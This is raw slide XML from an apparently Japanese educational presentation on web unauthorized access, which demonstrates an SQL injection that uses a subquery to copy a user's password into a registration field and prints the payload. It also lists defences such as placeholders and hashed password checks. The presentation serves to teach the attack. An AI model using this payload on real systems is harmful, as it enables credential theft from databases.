              <a:t>そこで</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>SELECT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>文では</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>ID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>で検索してパスワードを取り出し、パスワードをハッシュ認証して合致したらログイン成功とする方が確実</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>※</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>ただしプレースホルダは最低限のセキュリティ対策</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4090573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408670-9164-EAD7-890D-7FA0D1DD9EA4}"/>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92DF243A-AD7F-46AF-D2C6-27D86257BE2E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1825624"/>
            <a:ext cx="10515600" cy="4845519"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>情報漏洩</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>情報入力して</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>list</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>に登録のする一部プログラムを作成して</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>インジェクションができるようにし、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>の情報からパスワードを取り出す。</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>文の中に</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>文を入れる「サブクエリ」を用いることで他のデータベースの情報を入れることができる。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>例</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>INSERT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>文に</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>SELECT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>文で他のデータから取り出したデータを含めてレコードに追加できる。</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2300292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0B2EF9-384D-D103-F715-BB011CBBFF72}"/>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20526129-D5C7-6872-1A5A-8A6C88C3049D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>情報漏洩</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>仕組み</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>文に</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>文</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>サブクエリ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>を入れて他のテーブルの情報が入る</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>INSERT INTO list (</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0" err="1"/>
              <a:t>sex,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" err="1"/>
              <a:t>school</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0" err="1"/>
              <a:t>,post,name</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>VALUES (‘M’,’ZZ</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>大学</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>’,’</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>生徒</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>’,(</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>SELECT passwd FROM users WHERE id = 1))</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>とすると</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>name</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>のところに</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>users</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>テーブルの該当</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>が入る。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3707265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7D189-C891-283B-E2CE-501E6EDCC2A9}"/>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C4D0D185-5132-924A-E0F9-873379F5A0CE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>情報漏洩</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>サーバ側</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>ライブラリインポート</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>データベース接続</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>無画面</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>登録画面</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="図 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D54AFCB1-FF22-E9D8-113F-D473FCFBE0E7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4723580" y="2266757"/>
            <a:ext cx="5358012" cy="4226118"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1571713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657F41-4A2E-7D1A-0479-EBD8B644FEA5}"/>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5E8C6D6E-F807-C198-0EFF-A28F761223E8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>情報漏洩</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>サーバ側</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>情報の出力</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>情報の登録</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>実行</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="図 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D840A54B-4EB3-3166-D924-5AC41B580758}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3261360" y="2221256"/>
            <a:ext cx="5669279" cy="4446892"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4091603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2206A1-0D6F-B71C-02A7-2232E433009E}"/>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D88A050C-1D79-1C64-271A-C6D0F4AF9A0A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>情報漏洩</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>(HTML)</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="図 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EAA66B2F-47C4-5E94-AF07-54716F4A8C70}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="2516472"/>
            <a:ext cx="10515600" cy="2171183"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="テキスト ボックス 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F040118E-B089-B290-BE66-7C457ACE102D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4584207" y="4687655"/>
            <a:ext cx="3023585" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" dirty="0"/>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="2000" dirty="0"/>
              <a:t>ew_SQLinjection.html</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="72721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6FE3C7-9C5C-196E-A803-3F5660B79B0B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>における不正アクセスの被害</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="コンテンツ プレースホルダー 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{841747A2-C5E3-0DC6-255D-437506A923AE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>大まかな被害の種類</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>不正ログイン</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>何らかの方法で他人の</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>ID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>・パスワード・セッションを取得またはデータベースの脆弱性を用いたログイン</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>不正なデータ閲覧</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>本来権限のないデータベースのレコードやファイルなどにアクセスして情報を閲覧</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3969306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4D55E1-FC53-3B5C-D3AD-B1CFA63812E9}"/>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5D11F02A-DDD1-7E55-E8F1-006C6B03C14A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1825624"/>
            <a:ext cx="10794558" cy="5195377"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>情報漏洩</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>ブラウザ画面</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>ログインに使用したデータベースからパスワードを抜き取る</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r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>役職・立場の欄に</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>生徒</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>',(SELECT passwd FROM users WHERE id=1 LIMIT 0,1)) --</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>と打ち込む</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="図 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0D35D07B-5A67-2A3D-40E4-45603F3E428B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3066725" y="2836795"/>
            <a:ext cx="6058550" cy="2474820"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="38852806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9D38B1-8F59-9D8C-93A0-60ECBEA94280}"/>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86547389-3351-23EF-C019-1B1F69E6BFA9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
